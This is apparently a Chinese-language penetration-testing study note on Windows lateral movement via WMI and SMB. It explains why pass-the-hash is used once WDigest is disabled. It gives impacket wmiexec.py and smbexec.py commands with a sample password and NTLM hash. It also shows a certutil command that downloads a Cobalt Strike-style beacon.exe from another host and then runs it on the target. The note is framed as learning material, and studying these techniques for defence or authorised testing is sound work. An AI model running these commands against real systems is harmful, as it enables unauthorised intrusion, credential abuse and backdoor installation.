學習的目的

windows 2012以上默認關閉了Wdigest，所以攻擊者無法通過內存獲取到明文密碼
為了針對以上情況 所以有四種方法解決：
1.利用（PTH,PTK）等進行移動不需要明文
2.利用其他服務協議（SMB/WMI等進行哈希移動）
3.利用注冊表開啟（wdigest auth）進行獲取、
4.利用工具或者第三方平臺（HASHCAT進行破解獲取）

WMI

WMI全稱"windows管理規范"，從win2003開始一直存在。它原本的作用是方便管理員對windows主機進行管理。因此在內網滲透中，我們可以使用WMI進行橫向移動，支持用戶名明文或者hash的方式進行認證，并且該方法不會在目標日志系統留下痕跡。
利用條件：
1、WMI服務開啟，端口135，默認開啟。
2、防火墻允許135、445等端口通信。
3、知道目標機的賬戶密碼或HASH。

wmi橫向移動的使用：wmiexec-impacket （主要使用方法）

python wmiexec.py sqlserver/administrator:admin!@#45@192.168.3.32
python wmiexec.py sqlserver/administrator:admin!@#45@192.168.3.32 "whoami"
python wmiexec.py -hashes :518b98ad4178a53695dc997aa02d455c sqlserver/administrator@192.168.3.32 "whoami"
下載后門：
python wmiexec.py sqlserver/administrator:admin!@#45@192.168.3.32 "certutil -urlcache -split -f http://192.168.3.31/beacon.exe c:/beacon.exe"
執行后門：
python wmiexec.py sqlserver/administrator:admin!@#45@192.168.3.32 "c:/beacon.exe"

通過wmic 進行后門上線，這邊的主機名和用戶名是通過前期的信息收集收集而來的

SMB服務

SMB服務通常由文件服務器提供，它允許客戶端計算機通過網絡訪問服務器上的共享資源。通過SMB用戶可以在網絡上訪問和共享文件夾、文件以及打印機，從而實現在不同計算機之間方便地共享數據和打印輸出。利用SMB可通過明文或HASH傳遞來遠程執行。
利用條件：
1、文件與打印機服務開啟，默認開啟。
2、防火墻允許135、445等端口通信。
3、知道目標機的賬戶密碼或HASH。

利用方法
法一，smbexec-impacket

外部：(交互式)
python smbexec.py sqlserver/administrator:admin!@#45@192.168.3.32
python smbexec.py -hashes :518b98ad4178a53695dc997aa02d455c sqlserver/administrator@192.168.3.32

法二4.CS插件：
cs-psexec
SMB橫向移動：
推薦使用impacket和CS插件

IIS服務器的目錄 c:\inetpub\wwwroot

通過wmic 進行后門上線，這邊的主機名和用戶名是通過前期的信息收集收集而來的

有可以直接進行交互式的工具以及CS的插件cscript（不建議使用）

SMB橫向移動：
推薦使用impacket和CS插件

dcom是通過powershell進行利用的，只有windows7（windows server8）以后的版本才有powershell，并且需要關閉防火墻，比較雞肋。

實戰當中，要去分析防火墻限制了什么協議，然后再來選擇通過上面方式進行橫向移動
像SMB這種就需要開放文件和打印機共享，怎么判斷限制了什么協議，就可以直接使用impacket里面的代碼進行攻擊，成功的話就是可以

電腦是默認打開文件和打印機共享的，所以正常是可以使用SMB進行橫向移動的

主要注意幾個點：
（1）使用命令攻擊時計算機名需要寫入，分清域內用戶和域外用戶
（2）wmi，smb，dcom三個橫向手法所需要的條件，并且要學會什么時候使用什么協議進行攻擊，也就是用impacket進行探測，探測成功后進行使用
（3）掌握明文和非明文（hash）的攻擊方法
（4）掌握計算機名的信息收集，主要是通過spn收集，systeminfo，net view /domain